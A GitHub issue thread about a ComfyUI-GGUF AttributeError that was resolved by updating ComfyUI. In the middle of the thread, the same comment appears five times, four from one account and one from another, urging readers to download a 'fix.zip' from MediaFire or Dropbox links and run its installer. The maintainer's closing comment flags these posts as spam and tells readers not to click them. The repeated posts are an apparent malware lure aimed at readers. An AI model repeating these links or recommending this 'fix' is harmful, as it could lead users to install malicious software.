### ISSUE TITLE
AttributeError: module 'comfy.sd' has no attribute 'load_diffusion_model_state_dict'

### ISSUE THREAD

**Issue by CorradoF** [city96/ComfyUI-GGUF#72]
Me and others on Reddit have this problem
https://www.reddit.com/r/comfyui/comments/1eys1nr/flux_gguf_issue/

Solved by updating comfyui

**Comment by city96** [comment]
That reddit thread says you've tried updating, but the only issue that can cause this is ComfyUI being out of date. ~~Did you restart after the update?~~ nvm you got there before me lol

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by city96** [comment]
It looks like github is experiencing a [spam issue](https://github.com/search?l=&q=commenter%3Aswaggy111+is%3Aissue&type=issues) - locking this for now since they only seem to comment on the last open issue. Please do not click on any links posted.
